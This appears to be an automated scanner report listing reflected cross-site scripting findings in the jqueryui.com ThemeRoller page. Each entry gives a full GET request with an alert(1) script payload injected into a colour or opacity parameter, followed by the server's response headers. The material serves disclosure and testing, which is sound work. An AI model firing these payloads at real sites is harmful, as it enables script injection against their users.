GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff10fbb"><script>alert(1)</script>21f65dae1a0&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:40 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7317f"><script>alert(1)</script>b5f47834e30 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff7317f"><script>alert(1)</script>b5f47834e30&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69061"><script>alert(1)</script>1a694a592e7 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e669061"><script>alert(1)</script>1a694a592e7&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1c43"><script>alert(1)</script>a36a3b5f95c was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ece1c43"><script>alert(1)</script>a36a3b5f95c&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87fef"><script>alert(1)</script>4b472d7ef35 was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc87fef"><script>alert(1)</script>4b472d7ef35&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac242"><script>alert(1)</script>71aa1498cfe was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9eeac242"><script>alert(1)</script>71aa1498cfe&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64e26"><script>alert(1)</script>1a3124de35d was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada64e26"><script>alert(1)</script>1a3124de35d&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e4f1"><script>alert(1)</script>409c40fb7a8 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa1e4f1"><script>alert(1)</script>409c40fb7a8&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6e9c"><script>alert(1)</script>97a66de1e5d was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaad6e9c"><script>alert(1)</script>97a66de1e5d&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload effe2"><script>alert(1)</script>ea171b4358b was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65effe2"><script>alert(1)</script>ea171b4358b&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:36:45 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37be1"><script>alert(1)</script>2443dcf35 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=7537be1"><script>alert(1)</script>2443dcf35&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:35:57 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120061
The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cf69"><script>alert(1)</script>f530c1d1079 was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=753cf69"><script>alert(1)</script>f530c1d1079&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:36:13 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b812"><script>alert(1)</script>7ded0019f81 was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=955b812"><script>alert(1)</script>7ded0019f81&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:37:17 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 465c6"><script>alert(1)</script>ee3c1ef3667 was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
